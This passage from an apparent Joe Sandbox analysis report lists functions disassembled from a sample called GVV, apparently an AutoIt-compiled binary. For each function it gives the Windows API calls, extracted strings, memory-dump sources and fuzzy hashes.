                • Instruction Fuzzy Hash: B5E1B1392083018FC719DF24C55096AB7F2BFA9314F15896DF89A9B3A2D731ED85CB81
                Uniqueness

                Uniqueness Score: -1.00%

                Function 0019C998 Relevance: 30.0, APIs: 7, Strings: 10, Instructions: 242COMMON
                Download Yara Rule
                APIs
                Strings
                Memory Dump Source
                • Source File: 00000000.00000002.3889730927.0000000000111000.00000020.00000001.01000000.00000003.sdmp, Offset: 00110000, based on PE: true
                • Associated: 00000000.00000002.3889717556.0000000000110000.00000002.00000001.01000000.00000003.sdmpDownload File
                • Associated: 00000000.00000002.3889783916.00000000001AC000.00000002.00000001.01000000.00000003.sdmpDownload File
                • Associated: 00000000.00000002.3889783916.00000000001D2000.00000002.00000001.01000000.00000003.sdmpDownload File
                • Associated: 00000000.00000002.3889827683.00000000001DC000.00000004.00000001.01000000.00000003.sdmpDownload File
                • Associated: 00000000.00000002.3889842438.00000000001E4000.00000002.00000001.01000000.00000003.sdmpDownload File
                Joe Sandbox IDA Plugin
                • Snapshot File: hcaresult_0_2_110000_GVV.jbxd
                Similarity
                • API ID: _wcslen$BuffCharUpper
                • String ID: HKCC$HKCR$HKCU$HKEY_CLASSES_ROOT$HKEY_CURRENT_CONFIG$HKEY_CURRENT_USER$HKEY_LOCAL_MACHINE$HKEY_USERS$HKLM$HKU
                • API String ID: 1256254125-909552448
                • Opcode ID: a05e3ea6c4dcdd00468db9dc7be9d559902d4dcc79babb3f76c459b097295f72
                • Instruction ID: f161fb04efa51243d1612094e897f49ded6b328e815e4c7db0524241adb6205a
                • Opcode Fuzzy Hash: a05e3ea6c4dcdd00468db9dc7be9d559902d4dcc79babb3f76c459b097295f72
                • Instruction Fuzzy Hash: A471D33260016A8BCF20DE7CC9515BE3391ABB57A4F550529F8A6AB284F735DD85C3E0
                Uniqueness

                Uniqueness Score: -1.00%

                Function 001A833C Relevance: 29.9, APIs: 14, Strings: 3, Instructions: 196windowlibraryCOMMON
                Download Yara Rule
                APIs
                • _wcslen.LIBCMT ref: 001A835A
                • _wcslen.LIBCMT ref: 001A836E
                • _wcslen.LIBCMT ref: 001A8391
                • _wcslen.LIBCMT ref: 001A83B4
                • LoadImageW.USER32(00000000,?,00000001,?,?,00002010), ref: 001A83F2
                • LoadLibraryExW.KERNEL32(?,00000000,00000032,00000000,?,?,?,?,?,001A5BF2), ref: 001A844E
                • LoadImageW.USER32(?,?,00000001,?,?,00000000), ref: 001A8487
                • LoadImageW.USER32(00000000,?,00000001,?,?,00000000), ref: 001A84CA
                • LoadImageW.USER32(?,?,00000001,?,?,00000000), ref: 001A8501
                • FreeLibrary.KERNEL32(?), ref: 001A850D
                • ExtractIconExW.SHELL32(?,00000000,00000000,00000000,00000001), ref: 001A851D
                • DestroyIcon.USER32(?,?,?,?,?,001A5BF2), ref: 001A852C
                • SendMessageW.USER32(?,00000170,00000000,00000000), ref: 001A8549
                • SendMessageW.USER32(?,00000064,00000172,00000001), ref: 001A8555
                Strings
                Memory Dump Source
                • Source File: 00000000.00000002.3889730927.0000000000111000.00000020.00000001.01000000.00000003.sdmp, Offset: 00110000, based on PE: true
                • Associated: 00000000.00000002.3889717556.0000000000110000.00000002.00000001.01000000.00000003.sdmpDownload File
                • Associated: 00000000.00000002.3889783916.00000000001AC000.00000002.00000001.01000000.00000003.sdmpDownload File
                • Associated: 00000000.00000002.3889783916.00000000001D2000.00000002.00000001.01000000.00000003.sdmpDownload File
                • Associated: 00000000.00000002.3889827683.00000000001DC000.00000004.00000001.01000000.00000003.sdmpDownload File
                • Associated: 00000000.00000002.3889842438.00000000001E4000.00000002.00000001.01000000.00000003.sdmpDownload File
                Joe Sandbox IDA Plugin
                • Snapshot File: hcaresult_0_2_110000_GVV.jbxd
                Similarity
                • API ID: Load$Image_wcslen$IconLibraryMessageSend$DestroyExtractFree
                • String ID: .dll$.exe$.icl
                • API String ID: 799131459-1154884017
                • Opcode ID: c2c79e17e341efbfd633b3cf05feabcee28d4fb99393c1146dd3137fbb7cf4bd
                • Instruction ID: a98ee35bcd8e1783fa477f3d260230bb0ae1a6f0ab3feb107bd38ce6bede745f
                • Opcode Fuzzy Hash: c2c79e17e341efbfd633b3cf05feabcee28d4fb99393c1146dd3137fbb7cf4bd
                • Instruction Fuzzy Hash: 7861CF71A40215BFEB14DF64CC85BFE77A8BF19B21F10460AF815D61D1EB74AA90CBA0
                Uniqueness

                Uniqueness Score: -1.00%

                Function 00117778 Relevance: 28.3, APIs: 1, Strings: 15, Instructions: 273COMMON
                Download Yara Rule
                Strings
                Memory Dump Source
                • Source File: 00000000.00000002.3889730927.0000000000111000.00000020.00000001.01000000.00000003.sdmp, Offset: 00110000, based on PE: true
                • Associated: 00000000.00000002.3889717556.0000000000110000.00000002.00000001.01000000.00000003.sdmpDownload File
                • Associated: 00000000.00000002.3889783916.00000000001AC000.00000002.00000001.01000000.00000003.sdmpDownload File
                • Associated: 00000000.00000002.3889783916.00000000001D2000.00000002.00000001.01000000.00000003.sdmpDownload File
                • Associated: 00000000.00000002.3889827683.00000000001DC000.00000004.00000001.01000000.00000003.sdmpDownload File
                • Associated: 00000000.00000002.3889842438.00000000001E4000.00000002.00000001.01000000.00000003.sdmpDownload File
                Joe Sandbox IDA Plugin
                • Snapshot File: hcaresult_0_2_110000_GVV.jbxd
                Similarity
                • API ID:
                • String ID: "$#OnAutoItStartRegister$#ce$#comments-end$#comments-start$#cs$#include$#include-once$#notrayicon$#pragma compile$#requireadmin$'$Bad directive syntax error$Cannot parse #include$Unterminated group of comments
                • API String ID: 0-1645009161
                • Opcode ID: 1539c83c62d830f58db1abd150289552a909ba114fd54333fc54f5f81d9e3bba
                • Instruction ID: 2ddedd993c7aff650c0483aecc5cfe4d8c9687df24302f3282cbcf4cc4a3f555
                • Opcode Fuzzy Hash: 1539c83c62d830f58db1abd150289552a909ba114fd54333fc54f5f81d9e3bba
                • Instruction Fuzzy Hash: 02810671604605BBDB28AF60DC56FEE3BB9AF25300F044034FC15AA2D6EB70D996C7A1
                Uniqueness

                Uniqueness Score: -1.00%

                Function 00183E79 Relevance: 28.2, APIs: 8, Strings: 8, Instructions: 205COMMON
                Download Yara Rule
                APIs
                • CharLowerBuffW.USER32(?,?), ref: 00183EF8
                • _wcslen.LIBCMT ref: 00183F03
                • _wcslen.LIBCMT ref: 00183F5A
                • _wcslen.LIBCMT ref: 00183F98
                • GetDriveTypeW.KERNEL32(?), ref: 00183FD6
                • mciSendStringW.WINMM(?,00000000,00000000,00000000), ref: 0018401E
                • mciSendStringW.WINMM(?,00000000,00000000,00000000), ref: 00184059
                • mciSendStringW.WINMM(?,00000000,00000000,00000000), ref: 00184087
                Strings
                Memory Dump Source
                • Source File: 00000000.00000002.3889730927.0000000000111000.00000020.00000001.01000000.00000003.sdmp, Offset: 00110000, based on PE: true
                • Associated: 00000000.00000002.3889717556.0000000000110000.00000002.00000001.01000000.00000003.sdmpDownload File
                • Associated: 00000000.00000002.3889783916.00000000001AC000.00000002.00000001.01000000.00000003.sdmpDownload File
                • Associated: 00000000.00000002.3889783916.00000000001D2000.00000002.00000001.01000000.00000003.sdmpDownload File
                • Associated: 00000000.00000002.3889827683.00000000001DC000.00000004.00000001.01000000.00000003.sdmpDownload File
                • Associated: 00000000.00000002.3889842438.00000000001E4000.00000002.00000001.01000000.00000003.sdmpDownload File
                Joe Sandbox IDA Plugin
                • Snapshot File: hcaresult_0_2_110000_GVV.jbxd
                Similarity
                • API ID: SendString_wcslen$BuffCharDriveLowerType
                • String ID: type cdaudio alias cd wait$ wait$close$close cd wait$closed$open$open $set cd door
                • API String ID: 1839972693-4113822522
                • Opcode ID: cdc66b5d2209af9f84f49fa6c325d423d87eb90b87b883ee19805bbeaabfd106
                • Instruction ID: 0472b75637d1a9f5270002f887426bbd2ec631f16e9dbee5306cf2634cf764bd
                • Opcode Fuzzy Hash: cdc66b5d2209af9f84f49fa6c325d423d87eb90b87b883ee19805bbeaabfd106
                • Instruction Fuzzy Hash: 1071E5326042129FC314EF24C8809ABB7F4FFA4764F04492DF9A597251EB31EE85CB92
                Uniqueness

                Uniqueness Score: -1.00%

                Function 00175A1B Relevance: 27.2, APIs: 18, Instructions: 198windowtimeCOMMON
                Download Yara Rule
                APIs
                • LoadIconW.USER32(00000063), ref: 00175A2E
                • SendMessageW.USER32(?,00000080,00000000,00000000), ref: 00175A40
                • SetWindowTextW.USER32(?,?), ref: 00175A57
                • GetDlgItem.USER32(?,000003EA), ref: 00175A6C
                • SetWindowTextW.USER32(00000000,?), ref: 00175A72
                • GetDlgItem.USER32(?,000003E9), ref: 00175A82
                • SetWindowTextW.USER32(00000000,?), ref: 00175A88
                • SendDlgItemMessageW.USER32(?,000003E9,000000CC,?,00000000), ref: 00175AA9
                • SendDlgItemMessageW.USER32(?,000003E9,000000C5,00000000,00000000), ref: 00175AC3
                • GetWindowRect.USER32(?,?), ref: 00175ACC
                • _wcslen.LIBCMT ref: 00175B33
                • SetWindowTextW.USER32(?,?), ref: 00175B6F
                • GetDesktopWindow.USER32 ref: 00175B75
                • GetWindowRect.USER32(00000000), ref: 00175B7C
                • MoveWindow.USER32(?,?,00000080,00000000,?,00000000), ref: 00175BD3
                • GetClientRect.USER32(?,?), ref: 00175BE0
                • PostMessageW.USER32(?,00000005,00000000,?), ref: 00175C05
                • SetTimer.USER32(?,0000040A,00000000,00000000), ref: 00175C2F
                Memory Dump Source
                • Source File: 00000000.00000002.3889730927.0000000000111000.00000020.00000001.01000000.00000003.sdmp, Offset: 00110000, based on PE: true
                • Associated: 00000000.00000002.3889717556.0000000000110000.00000002.00000001.01000000.00000003.sdmpDownload File
                • Associated: 00000000.00000002.3889783916.00000000001AC000.00000002.00000001.01000000.00000003.sdmpDownload File
                • Associated: 00000000.00000002.3889783916.00000000001D2000.00000002.00000001.01000000.00000003.sdmpDownload File
                • Associated: 00000000.00000002.3889827683.00000000001DC000.00000004.00000001.01000000.00000003.sdmpDownload File
                • Associated: 00000000.00000002.3889842438.00000000001E4000.00000002.00000001.01000000.00000003.sdmpDownload File
                Joe Sandbox IDA Plugin
                • Snapshot File: hcaresult_0_2_110000_GVV.jbxd
                Similarity
                • API ID: Window$ItemMessageText$RectSend$ClientDesktopIconLoadMovePostTimer_wcslen
                • String ID:
                • API String ID: 895679908-0
                • Opcode ID: 5ab11a3fe97f3efc72f745c97f6a3aa69f49ca89d132734df563ed01259412d9
                • Instruction ID: e09eb13ae6e1f1bcd8a3b1ecdedafb842dd55f9a405404b9095cdfab69aeafc0
                • Opcode Fuzzy Hash: 5ab11a3fe97f3efc72f745c97f6a3aa69f49ca89d132734df563ed01259412d9
                • Instruction Fuzzy Hash: 8A715231900B05AFDB20DFA8CE45B6EBBF6FF48715F104518E54AA3590D7B5E944CB50
                Uniqueness

                Uniqueness Score: -1.00%

                Function 0018FE0E Relevance: 27.1, APIs: 18, Instructions: 128COMMON
                Download Yara Rule
                APIs
                • LoadCursorW.USER32(00000000,00007F89), ref: 0018FE27
                • LoadCursorW.USER32(00000000,00007F8A), ref: 0018FE32
                • LoadCursorW.USER32(00000000,00007F00), ref: 0018FE3D
                • LoadCursorW.USER32(00000000,00007F03), ref: 0018FE48
                • LoadCursorW.USER32(00000000,00007F8B), ref: 0018FE53
                • LoadCursorW.USER32(00000000,00007F01), ref: 0018FE5E
                • LoadCursorW.USER32(00000000,00007F81), ref: 0018FE69
                • LoadCursorW.USER32(00000000,00007F88), ref: 0018FE74
                • LoadCursorW.USER32(00000000,00007F80), ref: 0018FE7F
                • LoadCursorW.USER32(00000000,00007F86), ref: 0018FE8A
                • LoadCursorW.USER32(00000000,00007F83), ref: 0018FE95
                • LoadCursorW.USER32(00000000,00007F85), ref: 0018FEA0
                • LoadCursorW.USER32(00000000,00007F82), ref: 0018FEAB
                • LoadCursorW.USER32(00000000,00007F84), ref: 0018FEB6
                • LoadCursorW.USER32(00000000,00007F04), ref: 0018FEC1
                • LoadCursorW.USER32(00000000,00007F02), ref: 0018FECC
                • GetCursorInfo.USER32(?), ref: 0018FEDC
                • GetLastError.KERNEL32 ref: 0018FF1E
                Memory Dump Source
                • Source File: 00000000.00000002.3889730927.0000000000111000.00000020.00000001.01000000.00000003.sdmp, Offset: 00110000, based on PE: true
                • Associated: 00000000.00000002.3889717556.0000000000110000.00000002.00000001.01000000.00000003.sdmpDownload File
                • Associated: 00000000.00000002.3889783916.00000000001AC000.00000002.00000001.01000000.00000003.sdmpDownload File
                • Associated: 00000000.00000002.3889783916.00000000001D2000.00000002.00000001.01000000.00000003.sdmpDownload File
                • Associated: 00000000.00000002.3889827683.00000000001DC000.00000004.00000001.01000000.00000003.sdmpDownload File
                • Associated: 00000000.00000002.3889842438.00000000001E4000.00000002.00000001.01000000.00000003.sdmpDownload File
                Joe Sandbox IDA Plugin
                • Snapshot File: hcaresult_0_2_110000_GVV.jbxd
                Similarity
                • API ID: Cursor$Load$ErrorInfoLast
                • String ID:
                • API String ID: 3215588206-0
                • Opcode ID: 999ccb1e1a3cb1e36b882da5eb6abf0c1a21fcc0d83b600789d262d0017aa76d
                • Instruction ID: 59c4be4fd9390a202f79357dc031c35964daa9d9892f9c8a9a837318f88deebd
                • Opcode Fuzzy Hash: 999ccb1e1a3cb1e36b882da5eb6abf0c1a21fcc0d83b600789d262d0017aa76d
                • Instruction Fuzzy Hash: 3E4151B0D443196ADB109FBA8C8985EBFE8FF04354B50452AF11DE7281DB78A9418F91
                Uniqueness

                Uniqueness Score: -1.00%

                Function 001300C6 Relevance: 26.3, APIs: 10, Strings: 5, Instructions: 81COMMON
                Download Yara Rule
                APIs
                • __scrt_initialize_thread_safe_statics_platform_specific.LIBCMT ref: 001300C6
                  • Part of subcall function 001300ED: InitializeCriticalSectionAndSpinCount.KERNEL32(001E070C,00000FA0,9F0A8506,?,?,?,?,001523B3,000000FF), ref: 0013011C
                  • Part of subcall function 001300ED: GetModuleHandleW.KERNEL32(api-ms-win-core-synch-l1-2-0.dll,?,?,?,?,001523B3,000000FF), ref: 00130127
                  • Part of subcall function 001300ED: GetModuleHandleW.KERNEL32(kernel32.dll,?,?,?,?,001523B3,000000FF), ref: 00130138
                  • Part of subcall function 001300ED: GetProcAddress.KERNEL32(00000000,InitializeConditionVariable), ref: 0013014E
                  • Part of subcall function 001300ED: GetProcAddress.KERNEL32(00000000,SleepConditionVariableCS), ref: 0013015C
                  • Part of subcall function 001300ED: GetProcAddress.KERNEL32(00000000,WakeAllConditionVariable), ref: 0013016A
                  • Part of subcall function 001300ED: __crt_fast_encode_pointer.LIBVCRUNTIME ref: 00130195
                  • Part of subcall function 001300ED: __crt_fast_encode_pointer.LIBVCRUNTIME ref: 001301A0
                • ___scrt_fastfail.LIBCMT ref: 001300E7
                  • Part of subcall function 001300A3: __onexit.LIBCMT ref: 001300A9
                Strings
                • InitializeConditionVariable, xrefs: 00130148
                • SleepConditionVariableCS, xrefs: 00130154
                • kernel32.dll, xrefs: 00130133
                • api-ms-win-core-synch-l1-2-0.dll, xrefs: 00130122
                • WakeAllConditionVariable, xrefs: 00130162
                Memory Dump Source
                • Source File: 00000000.00000002.3889730927.0000000000111000.00000020.00000001.01000000.00000003.sdmp, Offset: 00110000, based on PE: true
                • Associated: 00000000.00000002.3889717556.0000000000110000.00000002.00000001.01000000.00000003.sdmpDownload File
                • Associated: 00000000.00000002.3889783916.00000000001AC000.00000002.00000001.01000000.00000003.sdmpDownload File
                • Associated: 00000000.00000002.3889783916.00000000001D2000.00000002.00000001.01000000.00000003.sdmpDownload File
                • Associated: 00000000.00000002.3889827683.00000000001DC000.00000004.00000001.01000000.00000003.sdmpDownload File
                • Associated: 00000000.00000002.3889842438.00000000001E4000.00000002.00000001.01000000.00000003.sdmpDownload File
                Joe Sandbox IDA Plugin
                • Snapshot File: hcaresult_0_2_110000_GVV.jbxd
                Similarity
                • API ID: AddressProc$HandleModule__crt_fast_encode_pointer$CountCriticalInitializeSectionSpin___scrt_fastfail__onexit__scrt_initialize_thread_safe_statics_platform_specific
                • String ID: InitializeConditionVariable$SleepConditionVariableCS$WakeAllConditionVariable$api-ms-win-core-synch-l1-2-0.dll$kernel32.dll
                • API String ID: 66158676-1714406822
                • Opcode ID: 914054f235a9031b54ab4527f390e5a4f8d2c8e37253b869ae9afbe3390f9390
                • Instruction ID: c32616d2667cc49ad41dad42185a65ecdd71e750cd4be0a7ad4e34dd190a1bc9
                • Opcode Fuzzy Hash: 914054f235a9031b54ab4527f390e5a4f8d2c8e37253b869ae9afbe3390f9390
                • Instruction Fuzzy Hash: C921F936A44710ABE7236BE4AC55B6E73E4EB0EF51F010139F801E6A91DBB49C808AD0
                Uniqueness

                Uniqueness Score: -1.00%

                Function 001730F7 Relevance: 24.9, APIs: 8, Strings: 6, Instructions: 400COMMON
                Download Yara Rule
                APIs
                Strings
                Memory Dump Source
                • Source File: 00000000.00000002.3889730927.0000000000111000.00000020.00000001.01000000.00000003.sdmp, Offset: 00110000, based on PE: true
                • Associated: 00000000.00000002.3889717556.0000000000110000.00000002.00000001.01000000.00000003.sdmpDownload File
                • Associated: 00000000.00000002.3889783916.00000000001AC000.00000002.00000001.01000000.00000003.sdmpDownload File
                • Associated: 00000000.00000002.3889783916.00000000001D2000.00000002.00000001.01000000.00000003.sdmpDownload File
                • Associated: 00000000.00000002.3889827683.00000000001DC000.00000004.00000001.01000000.00000003.sdmpDownload File
                • Associated: 00000000.00000002.3889842438.00000000001E4000.00000002.00000001.01000000.00000003.sdmpDownload File
                Joe Sandbox IDA Plugin
                • Snapshot File: hcaresult_0_2_110000_GVV.jbxd
                Similarity
                • API ID: _wcslen
                • String ID: CLASS$CLASSNN$INSTANCE$NAME$REGEXPCLASS$TEXT
                • API String ID: 176396367-1603158881
                • Opcode ID: 40be71fddd1bf7fa556bed8aa82335a7c65f56569f77f2aa89f4d040acd00102
                • Instruction ID: 2bcb49648df843f38da2c06b6fdab0e826e43f52d61d6c7ca5e6a188e6a7f67e
                • Opcode Fuzzy Hash: 40be71fddd1bf7fa556bed8aa82335a7c65f56569f77f2aa89f4d040acd00102
                • Instruction Fuzzy Hash: 83E1B532A00516ABCB289F78C4517EEFBB5BF54710F55C12AE46AB7240DB30AE85E790
                Uniqueness

                Uniqueness Score: -1.00%

                Function 001844C0 Relevance: 24.8, APIs: 7, Strings: 7, Instructions: 309COMMON
                Download Yara Rule
                APIs
                • CharLowerBuffW.USER32(00000000,00000000,001ACC08), ref: 00184527
                • _wcslen.LIBCMT ref: 0018453B
                • _wcslen.LIBCMT ref: 00184599
                • _wcslen.LIBCMT ref: 001845F4
                • _wcslen.LIBCMT ref: 0018463F
                • _wcslen.LIBCMT ref: 001846A7
                  • Part of subcall function 0012F9F2: _wcslen.LIBCMT ref: 0012F9FD
                • GetDriveTypeW.KERNEL32(?,001D6BF0,00000061), ref: 00184743
                Strings
                Memory Dump Source
                • Source File: 00000000.00000002.3889730927.0000000000111000.00000020.00000001.01000000.00000003.sdmp, Offset: 00110000, based on PE: true
                • Associated: 00000000.00000002.3889717556.0000000000110000.00000002.00000001.01000000.00000003.sdmpDownload File
                • Associated: 00000000.00000002.3889783916.00000000001AC000.00000002.00000001.01000000.00000003.sdmpDownload File
                • Associated: 00000000.00000002.3889783916.00000000001D2000.00000002.00000001.01000000.00000003.sdmpDownload File
                • Associated: 00000000.00000002.3889827683.00000000001DC000.00000004.00000001.01000000.00000003.sdmpDownload File
                • Associated: 00000000.00000002.3889842438.00000000001E4000.00000002.00000001.01000000.00000003.sdmpDownload File
                Joe Sandbox IDA Plugin
                • Snapshot File: hcaresult_0_2_110000_GVV.jbxd
                Similarity
                • API ID: _wcslen$BuffCharDriveLowerType
                • String ID: all$cdrom$fixed$network$ramdisk$removable$unknown
                • API String ID: 2055661098-1000479233
                • Opcode ID: 0d94e4816fddd0d8adc61276100aaca6e206f7bc3a82cf8181dce43e88f287ab
                • Instruction ID: 94e39266ce0829dc4728b2dc5cade7106749dea74d1112e8159e81792672f31c
                • Opcode Fuzzy Hash: 0d94e4816fddd0d8adc61276100aaca6e206f7bc3a82cf8181dce43e88f287ab
                • Instruction Fuzzy Hash: 35B1C3316083039FC714EF28C890A6EB7E5AFA5764F50492DF496C7291EB30DA85CF92
                Uniqueness

                Uniqueness Score: -1.00%

                Function 0019AFF9 Relevance: 24.4, APIs: 16, Instructions: 418processCOMMON
                Download Yara Rule
                APIs
                • _wcslen.LIBCMT ref: 0019B198
                • GetSystemDirectoryW.KERNEL32(00000000,00000000), ref: 0019B1B0
                • GetSystemDirectoryW.KERNEL32(00000000,00000000), ref: 0019B1D4
                • _wcslen.LIBCMT ref: 0019B200
                • GetCurrentDirectoryW.KERNEL32(00000000,00000000), ref: 0019B214
                • GetCurrentDirectoryW.KERNEL32(00000000,00000000), ref: 0019B236
                • _wcslen.LIBCMT ref: 0019B332
                  • Part of subcall function 001805A7: GetStdHandle.KERNEL32(000000F6), ref: 001805C6
                • _wcslen.LIBCMT ref: 0019B34B
                • _wcslen.LIBCMT ref: 0019B366
                • CreateProcessW.KERNEL32(00000000,?,00000000,00000000,?,?,00000000,?,?,?), ref: 0019B3B6
                • GetLastError.KERNEL32(00000000), ref: 0019B407
                • CloseHandle.KERNEL32(?), ref: 0019B439
                • CloseHandle.KERNEL32(00000000), ref: 0019B44A
                • CloseHandle.KERNEL32(00000000), ref: 0019B45C
                • CloseHandle.KERNEL32(00000000), ref: 0019B46E
                • CloseHandle.KERNEL32(?), ref: 0019B4E3
                Memory Dump Source
                • Source File: 00000000.00000002.3889730927.0000000000111000.00000020.00000001.01000000.00000003.sdmp, Offset: 00110000, based on PE: true
                • Associated: 00000000.00000002.3889717556.0000000000110000.00000002.00000001.01000000.00000003.sdmpDownload File
                • Associated: 00000000.00000002.3889783916.00000000001AC000.00000002.00000001.01000000.00000003.sdmpDownload File
                • Associated: 00000000.00000002.3889783916.00000000001D2000.00000002.00000001.01000000.00000003.sdmpDownload File
                • Associated: 00000000.00000002.3889827683.00000000001DC000.00000004.00000001.01000000.00000003.sdmpDownload File
                • Associated: 00000000.00000002.3889842438.00000000001E4000.00000002.00000001.01000000.00000003.sdmpDownload File
                Joe Sandbox IDA Plugin
                • Snapshot File: hcaresult_0_2_110000_GVV.jbxd
                Similarity
                • API ID: Handle$Close_wcslen$Directory$CurrentSystem$CreateErrorLastProcess
                • String ID:
                • API String ID: 2178637699-0
                • Opcode ID: 1d6522aa19e680814fd515f9c912e76e731025706fcdaa8233966f64719e053e
                • Instruction ID: 597040f6538708517384a0aea7a909e7461ad2e547b9c10ebbbd04e0eb141346
                • Opcode Fuzzy Hash: 1d6522aa19e680814fd515f9c912e76e731025706fcdaa8233966f64719e053e
                • Instruction Fuzzy Hash: 8EF1A0316083009FCB15EF24D991B6EBBE1BF85714F14856DF8999B2A2DB31EC44CB92
                Uniqueness

                Uniqueness Score: -1.00%

                Function 0011326F Relevance: 23.0, APIs: 12, Strings: 1, Instructions: 214windowCOMMON
                Download Yara Rule
                APIs
                • GetMenuItemCount.USER32(001E1990), ref: 00152F8D
                • GetMenuItemCount.USER32(001E1990), ref: 0015303D
                • GetCursorPos.USER32(?), ref: 00153081
                • SetForegroundWindow.USER32(00000000), ref: 0015308A
                • TrackPopupMenuEx.USER32(001E1990,00000000,?,00000000,00000000,00000000), ref: 0015309D
                • PostMessageW.USER32(00000000,00000000,00000000,00000000), ref: 001530A9
                Strings
                Memory Dump Source
                • Source File: 00000000.00000002.3889730927.0000000000111000.00000020.00000001.01000000.00000003.sdmp, Offset: 00110000, based on PE: true
                • Associated: 00000000.00000002.3889717556.0000000000110000.00000002.00000001.01000000.00000003.sdmpDownload File
                • Associated: 00000000.00000002.3889783916.00000000001AC000.00000002.00000001.01000000.00000003.sdmpDownload File
                • Associated: 00000000.00000002.3889783916.00000000001D2000.00000002.00000001.01000000.00000003.sdmpDownload File
                • Associated: 00000000.00000002.3889827683.00000000001DC000.00000004.00000001.01000000.00000003.sdmpDownload File
                • Associated: 00000000.00000002.3889842438.00000000001E4000.00000002.00000001.01000000.00000003.sdmpDownload File
                Joe Sandbox IDA Plugin
                • Snapshot File: hcaresult_0_2_110000_GVV.jbxd
                Similarity
                • API ID: Menu$CountItem$CursorForegroundMessagePopupPostTrackWindow
                • String ID: 0
                • API String ID: 36266755-4108050209
                • Opcode ID: add2b9108dd5e66f0efdefda76245d9e64f8d1496c1ad910509621727beabeec
                • Instruction ID: a5f395f1801c2d6359be300893b21e5014ffe04c875c02c8ea14a4de4be8df73
                • Opcode Fuzzy Hash: add2b9108dd5e66f0efdefda76245d9e64f8d1496c1ad910509621727beabeec
                • Instruction Fuzzy Hash: 93713771644205FEEB299F64DC89FAABF64FF02364F204216F9346A1E0C7B1A954CB90
                Uniqueness

                Uniqueness Score: -1.00%

                Function 001A6CD9 Relevance: 22.9, APIs: 11, Strings: 2, Instructions: 194windowCOMMON
                Download Yara Rule
                APIs
                • DestroyWindow.USER32(?,?), ref: 001A6DEB
                  • Part of subcall function 00116B57: _wcslen.LIBCMT ref: 00116B6A
                • CreateWindowExW.USER32(00000008,tooltips_class32,00000000,?,80000000,80000000,80000000,80000000,?,00000000,00000000,?), ref: 001A6E5F
                • SendMessageW.USER32(00000000,00000433,00000000,00000030), ref: 001A6E81
                • SendMessageW.USER32(00000000,00000432,00000000,00000030), ref: 001A6E94
                • DestroyWindow.USER32(?), ref: 001A6EB5
                • CreateWindowExW.USER32(00000008,tooltips_class32,00000000,?,80000000,80000000,80000000,80000000,?,00000000,00110000,00000000), ref: 001A6EE4
                • SendMessageW.USER32(00000000,00000432,00000000,00000030), ref: 001A6EFD
                • GetDesktopWindow.USER32 ref: 001A6F16
                • GetWindowRect.USER32(00000000), ref: 001A6F1D
                • SendMessageW.USER32(00000000,00000418,00000000,?), ref: 001A6F35
                • SendMessageW.USER32(00000000,00000421,?,00000000), ref: 001A6F4D
                  • Part of subcall function 00129944: GetWindowLongW.USER32(?,000000EB), ref: 00129952
                Strings
                Memory Dump Source
                • Source File: 00000000.00000002.3889730927.0000000000111000.00000020.00000001.01000000.00000003.sdmp, Offset: 00110000, based on PE: true
                • Associated: 00000000.00000002.3889717556.0000000000110000.00000002.00000001.01000000.00000003.sdmpDownload File
                • Associated: 00000000.00000002.3889783916.00000000001AC000.00000002.00000001.01000000.00000003.sdmpDownload File
                • Associated: 00000000.00000002.3889783916.00000000001D2000.00000002.00000001.01000000.00000003.sdmpDownload File
                • Associated: 00000000.00000002.3889827683.00000000001DC000.00000004.00000001.01000000.00000003.sdmpDownload File
                • Associated: 00000000.00000002.3889842438.00000000001E4000.00000002.00000001.01000000.00000003.sdmpDownload File
                Joe Sandbox IDA Plugin
                • Snapshot File: hcaresult_0_2_110000_GVV.jbxd
                Similarity
                • API ID: Window$MessageSend$CreateDestroy$DesktopLongRect_wcslen
                • String ID: 0$tooltips_class32
                • API String ID: 2429346358-3619404913
                • Opcode ID: 2c2f9958f86914f56a545eaaf2987b559a14a7dc1b4b5bb9c477fceffb5a2cb7
                • Instruction ID: 0a2dae6a8673a6342ad05d83c464f7a9ffe101086f62a0a8be6b116ecfef2c33
                • Opcode Fuzzy Hash: 2c2f9958f86914f56a545eaaf2987b559a14a7dc1b4b5bb9c477fceffb5a2cb7
                • Instruction Fuzzy Hash: 84716778144244AFDB21CF28DC94FBABBE9FB8A304F08041EF999872A1C770A945CB51
                Uniqueness

                Uniqueness Score: -1.00%

                Function 001A911E Relevance: 22.9, APIs: 10, Strings: 3, Instructions: 181windowfileCOMMON
                Download Yara Rule
                APIs
                  • Part of subcall function 00129BA1: GetWindowLongW.USER32(00000000,000000EB), ref: 00129BB2
                • DragQueryPoint.SHELL32(?,?), ref: 001A9147
                  • Part of subcall function 001A7674: ClientToScreen.USER32(?,?), ref: 001A769A
                  • Part of subcall function 001A7674: GetWindowRect.USER32(?,?), ref: 001A7710
                  • Part of subcall function 001A7674: PtInRect.USER32(?,?,001A8B89), ref: 001A7720
                • SendMessageW.USER32(?,000000B0,?,?), ref: 001A91B0
                • DragQueryFileW.SHELL32(?,000000FF,00000000,00000000), ref: 001A91BB
                • DragQueryFileW.SHELL32(?,00000000,?,00000104), ref: 001A91DE
                • SendMessageW.USER32(?,000000C2,00000001,?), ref: 001A9225
                • SendMessageW.USER32(?,000000B0,?,?), ref: 001A923E
                • SendMessageW.USER32(?,000000B1,?,?), ref: 001A9255
                • SendMessageW.USER32(?,000000B1,?,?), ref: 001A9277
                • DragFinish.SHELL32(?), ref: 001A927E
                • DefDlgProcW.USER32(?,00000233,?,00000000,?,?,?), ref: 001A9371
                Strings
                Memory Dump Source
                • Source File: 00000000.00000002.3889730927.0000000000111000.00000020.00000001.01000000.00000003.sdmp, Offset: 00110000, based on PE: true
                • Associated: 00000000.00000002.3889717556.0000000000110000.00000002.00000001.01000000.00000003.sdmpDownload File
                • Associated: 00000000.00000002.3889783916.00000000001AC000.00000002.00000001.01000000.00000003.sdmpDownload File
                • Associated: 00000000.00000002.3889783916.00000000001D2000.00000002.00000001.01000000.00000003.sdmpDownload File
                • Associated: 00000000.00000002.3889827683.00000000001DC000.00000004.00000001.01000000.00000003.sdmpDownload File
                • Associated: 00000000.00000002.3889842438.00000000001E4000.00000002.00000001.01000000.00000003.sdmpDownload File
                Joe Sandbox IDA Plugin
                • Snapshot File: hcaresult_0_2_110000_GVV.jbxd
                Similarity
                • API ID: MessageSend$Drag$Query$FileRectWindow$ClientFinishLongPointProcScreen
                • String ID: @GUI_DRAGFILE$@GUI_DRAGID$@GUI_DROPID
                • API String ID: 221274066-3440237614
                • Opcode ID: 2af42d13a9c312964b08f4d873f9f9a7ea4e6994561293056f1c3cf661d43e77
